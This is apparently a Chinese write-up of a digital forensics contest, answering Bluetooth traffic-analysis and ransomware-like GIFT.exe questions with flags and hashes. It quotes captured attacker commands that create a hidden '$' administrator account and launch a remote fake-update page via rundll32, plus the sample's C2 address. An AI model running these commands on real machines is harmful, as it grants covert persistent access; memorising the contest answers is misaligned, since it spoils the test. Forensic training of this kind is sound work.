2025第二届“平航杯”电子数据取证竞赛团队赛-剩余部分(流量分析、exe部分)
2025第二届“平航杯”电子数据取证竞赛团队赛-剩余部分(流量分析、exe部分)
-
- 关注鱼影安全
- 前言:
- 流量分析:
-
- 1.请问侦查人员是用哪个接口进行抓到蓝牙数据包的(格式:DVI1-2.1)
- 2.起早王有一个用于伪装成倩倩耳机的蓝牙设备,该设备的原始设备名称为什么(格式:XXX_xxx 具体大小写按照原始内容)
- 3.起早王有一个用于伪装成倩倩耳机的蓝牙设备,该设备修改成耳机前后的大写MAC地址分别为多少(格式:32位小写md5(原MAC地址_修改后的MAC地址) ,例如md5(11:22:33:44:55:66_77:88:99:AA:BB:CC)=a29ca3983de0bdd739c97d1ce072a392 )
- 4.流量包中首次捕获到该伪装设备修改自身名称的UTC+0时间为?(格式:2024/03/07 01:02:03.123)
- 5.起早王中途还不断尝试使用自己的手机向倩倩电脑进行广播发包,请你找出起早王手机蓝牙的制造商数据(格式:0x0102030405060708)
- 6.起早王的真名是什么(格式:Cai_Xu_Kun 每个首字母均需大写 )
- 7.起早王对倩倩的电脑执行了几条cmd里的命令(格式:1 )
- 8.倩倩电脑中影子账户的账户名和密码为什么(格式:32位小写md5(账号名称_密码) ,例如md5(zhangsan_123456)=9dcaac0e4787b213fed42e5d78affc75 )
- 9.起早王对倩倩的电脑执行的最后一条命令是什么(格式:32位小写md5(完整命令),例如md5(echo "qianqianwoaini" > woshiqizaowang.txt)=1bdb83cfbdf29d8c2177cc7a6e75bae2 )
- Exe部分:
-
- 1.分析GIFT.EXE,该程序的MD5是什么(格式:大写MD5)
- 2.GIFT.exe的使用的编程语言是什么(格式:C)
- 3.解开得到的LOVE2.exe的编译时间(格式:2025/1/1 01:01:01)
- 4.分析GIFT.exe,该病毒所关联到的ip和端口(格式:127.0.0.1:1111)
- 5.分析GIFT.exe,该病毒修改的壁纸md5(格式:大写md5)
- 6.分析GIFT.exe,为对哪些后缀的文件进行加密: A.doc B.xlsx C.jpg D.png E.ppt
- 7.分析GIFT.exe,病毒加密后的文件类型是什么(格式:DOCX文档)
- 8.分析GIFT.exe,壁纸似乎被隐形水印加密过了?请找到其中的Flag3(格式:flag3{xxxxxxxx})
- 9.分析GIFT.exe,病毒加密文件所使用的方法是什么(格式:Base64)
- 10.分析GIFT.exe,请解密test.love得到flag4(格式:flag4{xxxxxxxx})
- 需要电子取证培训dd!
关注鱼影安全
前言:
流量分析:
1.请问侦查人员是用哪个接口进行抓到蓝牙数据包的(格式:DVI1-2.1)
打开发现是蓝牙流量 第一次做

正确答案:COM3-3.6
2.起早王有一个用于伪装成倩倩耳机的蓝牙设备,该设备的原始设备名称为什么(格式:XXX_xxx 具体大小写按照原始内容)
导出.josn 文件 VS 打开 搜关键字 name

正确答案:Flipper_123all
3.起早王有一个用于伪装成倩倩耳机的蓝牙设备,该设备修改成耳机前后的大写MAC地址分别为多少(格式:32位小写md5(原MAC地址_修改后的MAC地址) ,例如md5(11:22:33:44:55:66_77:88:99:AA:BB:CC)=a29ca3983de0bdd739c97d1ce072a392 )
直接搜QQ_WF_SP8OON



正确答案:97d79a5f219e6231f7456d307c8cac68
4.流量包中首次捕获到该伪装设备修改自身名称的UTC+0时间为?(格式:2024/03/07 01:02:03.123)
因为 wireshark 第一层都会显示中国时间直接搜
时间戳 UTF+8 时差为 8 10-8=2
正确答案:2025/04/09 02:31:26.710
5.起早王中途还不断尝试使用自己的手机向倩倩电脑进行广播发包,请你找出起早王手机蓝牙的制造商数据(格式:0x0102030405060708)
搜索cracked

正确答案:0x0701434839313430
6.起早王的真名是什么(格式:Cai_Xu_Kun 每个首字母均需大写 )
一把梭哈

正确答案:Wang_Qi_Zhao
7.起早王对倩倩的电脑执行了几条cmd里的命令(格式:1 )
bao bao,zui jin you ge nan sheng xiang zhui wo,ta jiaao wwang qi qi zao wang ta shuo ta ai wo,dan shi cong bu baang wo na kuai di,hao fan acmd<RET>BDFGGHIIKLNNOOMLJJIIHIIJKLLKHIGGFEEDBCAAABBBABCEDEEDEEEFEGGIFFCBBAACCCFFHGFEDCCBBABEEEGFFDCA whoami<RET>net user<RET>net user qianqianwoaini$ abcdefghijkImn /add<RET>net localgroup administrators qianqianwoaini$ /add<RET>net user qianqianwoaini$ /delCGIKLLMMLLJJHHHFECB<RET>net localgroup administrators qianqianwoaini$ /add<RET>rundll32 url.dll,FileProtocolHandler https"//fakeupdate.net/win10ue/bsod.htmlGJKGECCAAA<RET>CEGHKMMNNLLJHFDB

正确答案:7
8.倩倩电脑中影子账户的账户名和密码为什么(格式:32位小写md5(账号名称_密码) ,例如md5(zhangsan_123456)=9dcaac0e4787b213fed42e5d78affc75 )
上面 ai 帮忙分析了:net user qianqianwoaini$ abcdefghijkImn /add
qianqianwoaini$_abcdefghijkImn

正确答案:53af9cd5e53e237020bea0932a1cbdaa
9.起早王对倩倩的电脑执行的最后一条命令是什么(格式:32位小写md5(完整命令),例如md5(echo “qianqianwoaini” > woshiqizaowang.txt)=1bdb83cfbdf29d8c2177cc7a6e75bae2 )
最后一条命令 ai 也分析了按题目要求加密下:
rundll32 url.dll,FileProtocolHandler https://fakeupdate.net/win10ue/bsod.html

正确答案:0566c1d6dd49db699d422db31fd1be8f
Exe部分:
1.分析GIFT.EXE,该程序的MD5是什么(格式:大写MD5)

正确答案:5A20B10792126FFA324B91E506F67223
2.GIFT.exe的使用的编程语言是什么(格式:C)
PE 直接分析 看到打包工具PyInstaller 所以是 Python

正确答案:Python
3.解开得到的LOVE2.exe的编译时间(格式:2025/1/1 01:01:01)
之前做题得到身份证了 所以尝试身份证的生日就是密码
20010811
运行本机 炸了 鼠标都变成这个了 爱心,微步查杀下 发现有时间

C:\Users\起早王\AppData\Local\Temp\gift_extracted


正确答案:2025/4/8 09:59:40
4.分析GIFT.exe,该病毒所关联到的ip和端口(格式:127.0.0.1:1111)
奇安信沙盒
正确答案:106.46.26.92:80
5.分析GIFT.exe,该病毒修改的壁纸md5(格式:大写md5)
关闭防火墙 运行 love2.exe 但是我关了还是运行不起来,本机运行了 已经 gg 了 用工具提取了


导出 直接 md5 加密即可 要求大写
正确答案:733FC4483C0E7DB1C034BE5246DF5EC0
6.分析GIFT.exe,为对哪些后缀的文件进行加密: A.doc B.xlsx C.jpg D.png E.ppt
IDA 查看 exe 得到:

ABE
7.分析GIFT.exe,病毒加密后的文件类型是什么(格式:DOCX文档)
直接查看属性就行

正确答案:LOVE Encrypted File
8.分析GIFT.exe,壁纸似乎被隐形水印加密过了?请找到其中的Flag3(格式:flag3{xxxxxxxx})
直接使用工具提取水印

正确答案:flag3{20241224_Our_First_Meet}
9.分析GIFT.exe,病毒加密文件所使用的方法是什么(格式:Base64)
ove.jpeg 发现 RSA 私钥


正确答案:RSA
10.分析GIFT.exe,请解密test.love得到flag4(格式:flag4{xxxxxxxx})


正确答案:flag4{104864DF-C420-04BB5F51F267}
需要电子取证培训dd!
DAMO开发者矩阵,由阿里巴巴达摩院和中国互联网协会联合发起,致力于探讨最前沿的技术趋势与应用成果,搭建高质量的交流与分享平台,推动技术创新与产业应用链接,围绕“人工智能与新型计算”构建开放共享的开发者生态。
更多推荐


所有评论(0)